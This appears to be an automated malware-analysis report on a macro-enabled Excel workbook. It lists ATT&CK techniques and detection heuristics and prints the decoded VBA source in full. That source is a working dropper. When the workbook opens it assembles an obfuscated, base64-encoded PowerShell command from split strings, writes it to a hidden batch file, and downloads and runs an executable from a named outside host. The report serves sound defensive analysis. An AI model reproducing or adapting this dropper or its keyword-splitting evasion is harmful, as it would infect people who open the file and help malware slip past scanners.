Verdict: MALICIOUS (Risk Score: 140)

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros that use obfuscated string concatenation to construct and execute a PowerShell command. This command is designed to download and execute a second-stage payload from the URL 'http://nhry9udg.gize.com/XX/xml/swoolsV.exe'. The use of Shell() and the reassembled 'PowerShell' keyword indicate a clear intent to execute external code.
Heuristics (3)
- VBA project inside OOXML (medium, 2 related findings): OOXML_VBA. Document contains a VBA project; VBA macros present.
- Shell() call in VBA (critical): OLE_VBA_SHELL. Shell() call in VBA.
- Dangerous API name reassembled from split string literals (critical): OLE_VBA_SPLIT_KEYWORD_OBFUSCATION. VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2602 bytes | 885e9d5cc539b44151a48d704b164d430923f94d4f072dc7a96d432e2f876ba7 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 6144 bytes | 9efccbeb664c77aab997275a8c7009ca2c08b433b79f24aff8c3d718fd43b6af |

Preview script for macros.bas: first 1,000 lines of the extracted script.

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)
End Sub
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)
End Sub
Private Sub Workbook_Activate()
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String
Dim s As String
s = s + "start /MIN C:\Windo"
s = s + "ws\System32\" + "Wind" + "owsPo" + "werShe" + "ll\v1.0\pow" + "ersh" + "ell.exe"
s = s + " -win " + "1 -enc"
s = s + " "
s = s + "JABQAHIAbwBjAE4"
s = s + "AYQBtAGUAIAA9AC"
s = s + "AAIgBVAGsAcQB6A"
s = s + "HIAdABkAHEAcgBo"
s = s + "AHYAZABvAGMAdAB"
s = s + "sAHgALgBlAHgAZQ"
s = s + "AiADsAKABOAGUAd"
s = s + "wAtAE8AYgBqAGUA"
s = s + "YwB0ACAAUwB5AHM"
s = s + "AdABlAG0ALgBOAG"
s = s + "UAdAAuAFcAZQBiA"
s = s + "EMAbABpAGUAbgB0"
s = s + "ACkALgBEAG8AdwB"
s = s + "uAGwAbwBhAGQARg"
s = s + "BpAGwAZQAoACIAa"
s = s + "AB0AHQAcAA6AC8A"
s = s + "LwBuAGgAcgB5ADk"
s = s + "AdABnAC4AZwBpAG"
s = s + "kAegBlAC4AYwBvA"
s = s + "G0ALwBYAFgAWAAv"
s = s + "AHgAbQBsAC8AcwB"
s = s + "wAG8AbwBsAHMAdg"
s = s + "AuAGUAeABlACIAL"
s = s + "AAiACQAZQBuAHYA"
s = s + "OgBBAFAAUABEAEE"
s = s + "AVABBAFwAJABQAH"
s = s + "IAbwBjAE4AYQBtA"
s = s + "GUAIgApADsAUwB0"
s = s + "AGEAcgB0AC0AUAB"
s = s + "yAG8AYwBlAHMAcw"
s = s + "AgACgAIgAkAGUAb"
s = s + "gB2ADoAQQBQAFAA"
s = s + "RABBAFQAQQBcACQ"
s = s + "AUAByAG8AYwBOAG"
s = s + "EAbQBlACIAKQA="
ActiveWorkbook.Save
batch = "Pegpgdjacxprwtaahcsdty.bat"
Open batch For Output As #1
Print #1, s
Close #1
i = Shell(batch, 0)
End Sub
Private Sub Cellss()
End Sub
Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)
End Sub
Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```